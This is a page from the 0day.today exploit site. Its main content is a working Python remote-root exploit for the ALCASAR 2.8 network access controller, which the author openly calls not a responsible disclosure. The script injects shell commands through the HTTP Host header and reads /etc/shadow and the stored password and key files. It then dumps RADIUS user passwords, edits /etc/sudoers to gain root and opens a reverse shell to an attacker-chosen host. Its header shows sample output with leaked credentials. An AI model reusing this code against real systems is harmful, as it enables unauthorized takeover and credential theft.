0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
ALCASAR 2.8 Remote Root Code Execution Exploit
[#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
####
#
# ALCASAR <= 2.8 Remote Root Code Execution Vulnerability
#
# Author: eF
# Date : 2014-02-10
#
#
# db 88 ,ad8888ba, db ad88888ba db 88888888ba
# d88b 88 d8"' `"8b d88b d8" "8b d88b 88 "8b
# d8'`8b 88 d8' d8'`8b Y8, d8'`8b 88 ,8P
# d8' `8b 88 88 d8' `8b `Y8aaaaa, d8' `8b 88aaaaaa8P'
# d8YaaaaY8b 88 88 d8YaaaaY8b `"""""8b, d8YaaaaY8b 88""""88'
# d8""""""""8b 88 Y8, d8""""""""8b `8b d8""""""""8b 88 `8b
# d8' `8b 88 Y8a. .a8P d8' `8b Y8a a8P d8' `8b 88 `8b
# d8' `8b 88888888888 `"Y8888Y"' d8' `8b "Y88888P" d8' `8b 88 `8b
#
#
# ALCASAR is a free Network Access Controller which controls the Internet
# consultation networks. It authenticates, attributes and protects users'
# access regardless their connected equipment (PC, Pokédex, game console,
# etc.).
#
#
# ALCASAR Web UI, accessible by any unauthenticated user, suffers from a
# trivial vulnerability. In the "index.php" file:
#
# $pattern = preg_replace('/www./','',$_SERVER['HTTP_HOST']);
# exec("grep -Re ^$pattern$ /etc/dansguardian/lists/blacklists/*/domains|cut -d'/' -f6", $output);
#
# By sending a specially crafted value in the "host" HTTP header, it is possible
# to inject the exec() function in order to execute commands as Apache user.
#
# In addition, the Apache user is able to call sudo for these binaries:
#
# /sbin/ip,/sbin/arping,/sbin/arp,/usr/sbin/arpscan,/usr/sbin/tcpdump,/usr/local/bin/alcasar-watchdog.sh,/usr/local/sbin/alcasar-dhcp.sh
# /usr/local/bin/alcasar-conf.sh
# /usr/local/sbin/alcasar-mysql.sh
# /usr/local/sbin/alcasar-bl.sh,/usr/local/sbin/alcasar-havp.sh,/usr/local/bin/alcasar-file-clean.sh,/usr/local/sbin/alcasar-url_filter.sh
# /usr/local/sbin/alcasar-nf.sh,/usr/local/bin/alcasar-iptables.sh,/usr/sbin/ipset
# /usr/local/bin/alcasar-archive.sh
# /usr/bin/radwho,/usr/sbin/chilli_query
# /usr/local/sbin/alcasar-logout.sh
# /sbin/service,/usr/bin/killall,/sbin/chkconfig,/bin/systemctl
# /usr/bin/openssl
#
# As a result, we can use /usr/bin/openssl to read a file as root:
#
# sudo /usr/bin/openssl base64 -in /etc/shadow -A | base64 -d
#
# Or to create or overwrite files as root (create a cron job, edit /etc/sudoers, etc.):
#
# echo cHduZWQK | sudo /usr/bin/openssl base64 -d -out /etc/cron.d/pwned
#
# In this exploit, I choose to modify the "sudoers" file.
#
# Note: this vulnerability has been discovered in less than 30 seconds.
# Others vulnerabilities are still present. This code has never been audited...
# The PHP code is dreadful and needs to be rewritten from scratch.
#
# Example (post-auth) in file acc/admin/activity.php:
#
# if (isset($_POST['action'])){
# switch ($_POST['action']){
# case 'user_disconnect' :
# exec ("sudo /usr/sbin/chilli_query logout $_POST[mac_addr]");
#
#
# This is not a responsible disclosure coz' I have no sense of ethics and I couldn't care less.
#
#
# % python alcasar-2.8_rce.py alcasar.localdomain "alcasar-version.sh"
#
# [+] Hello, first here are some passwords for you:
# Password to protect the boot menu (GRUB) : cV9eEz1g
# Name and password of Mysql/mariadb administrator : root / FvYPr7b3
# Name and password of Mysql/mariadb user : radius / oRNln64j
# Shared secret between the script 'intercept.php' and coova-chilli : b9Rj34jz
# Shared secret between coova-chilli and FreeRadius : 7tIrnkJu
#
# root:$2a$08$Aw4yIxQIUJ0taDjiXKSRYu6zZB5eUcbZ4445vo1157AdeGSfe1XuC:16319:0:99999:7:::
#
# [...]
#
# admin:alcasar.localdomain:49b8642b4646a4afa38cda065f76ce0e
#
# username value
# user $1$passwd$qr0Ajhr12fZ475a2qAZ.H.
#
# [-] whoami (should be apache):
# uid=495(apache) gid=492(apache) groups=492(apache)
#
# [+] On the way to the uid 0...
# [-] Got root?
# uid=0(root) gid=0(root) groups=0(root)
#
# [+] Your command Sir:
# The Running version (2.8) is up to date
#
#
####
import sys, os, re, httplib
class PWN_Alcasar:
def __init__(self, host):
self.host = host
self.root = False
def exec_cmd(self, cmd, output=False):
tag = os.urandom(4).encode('hex')
cmd = 'bash -c "%s" 2>&1' % cmd.replace('"', '\\"')
if self.root:
cmd = 'sudo %s' % cmd
headers = {
'host' : 'aAaAa index.php;echo %s;echo %s|base64 -d -w0|sh|base64 -w0;#' % (tag, cmd.encode('base64').replace('\n',''))
}
c = httplib.HTTPConnection(self.host)
c.request('GET', '/index.php', '', headers)
r = c.getresponse()
data = r.read()
c.close()
if data.find(tag) != -1:
m = re.search(r'%s, (.*)\s</div>' % tag, data)
if m:
data = m.group(1).decode('base64')
if output:
print data
return data
return None
def read_file(self, filepath, output=True):
return self.exec_cmd('sudo openssl base64 -in %s -A|base64 -d' % filepath, output=output)
def read_passwords(self):
self.read_file('/root/ALCASAR-passwords.txt')
self.read_file('/etc/shadow')
self.read_file('/usr/local/etc/digest/key_all')
self.read_file('/usr/local/etc/digest/key_admin')
self.read_file('/usr/local/etc/digest/key_backup')
self.read_file('/usr/local/etc/digest/key_manager')
self.read_file('/usr/local/etc/digest/key_only_admin')
self.read_file('/usr/local/etc/digest/key_only_backup')
self.read_file('/usr/local/etc/digest/key_only_manager')
alcasar_mysql = self.read_file('/usr/local/sbin/alcasar-mysql.sh', output=False)
if alcasar_mysql:
m = re.search(r'radiuspwd="(.*)"', alcasar_mysql)
if m:
radiuspwd = m.group(1)
sql = 'SELECT username,value FROM radcheck WHERE attribute like \'%%password%%\''
self.exec_cmd('mysql -uradius -p\"%s\" radius -e "%s"' % (radiuspwd, sql), output=True)
def edit_sudoers(self):
self.exec_cmd('sudo openssl base64 -in /etc/sudoers -out /tmp/sudoers.b64')
self.exec_cmd('openssl base64 -d -in /tmp/sudoers.b64 -out /tmp/sudoers')
self.exec_cmd('sed -i s/BL,NF/BL,ALL,NF/g /tmp/sudoers')
self.exec_cmd('sudo openssl base64 -in /tmp/sudoers -out /tmp/sudoers.b64')
self.exec_cmd('sudo openssl base64 -d -in /tmp/sudoers.b64 -out /etc/sudoers')
self.exec_cmd('sudo rm -f /tmp/sudoers*')
self.root = True
def reverse_shell(self, rip, rport='80'):
payload = 'import socket,subprocess,os;'
payload += 's=socket.socket(socket.AF_INET,socket.SOCK_STREAM);'
payload += 's.connect((\'%s\',%s));' % (rip, rport)
payload += 'os.dup2(s.fileno(),0);'
payload += 'os.dup2(s.fileno(),1);'
payload += 'os.dup2(s.fileno(),2);'
payload += 'p=subprocess.call([\'/bin/sh\',\'-i\']);'
return self.exec_cmd('python -c "%s"' % payload)
def usage():
print 'Usage: %s host command (ip) (port)' % sys.argv[0]
print ' "command" can be a shell command or "reverseshell"'
sys.exit(0)
if __name__ == '__main__':
if len(sys.argv) < 3:
usage()
cmd = sys.argv[2]
if cmd == 'reverseshell':
if len(sys.argv) < 5:
print '[!] Need IP and port for the reverse shell...'
sys.exit(0)
rip = sys.argv[3]
rport = sys.argv[4] # 80 is a good one...
exploit = PWN_Alcasar(sys.argv[1])
print '[+] Hello, first here are some passwords for you:'
exploit.read_passwords()
print '[-] whoami (should be apache):'
exploit.exec_cmd('id', output=True)
print '[+] On the way to the uid 0...'
exploit.edit_sudoers()
print '[-] Got root?'
exploit.exec_cmd('id', output=True)
if cmd == 'reverseshell':
print '[+] You should now have a shell on %s:%s' % (rip, rport)
exploit.reverse_shell(rip, rport)
else:
print '[+] Your command Sir:'
exploit.exec_cmd(cmd, output=True)
sys.exit(1)
# 0day.today [2024-11-15] #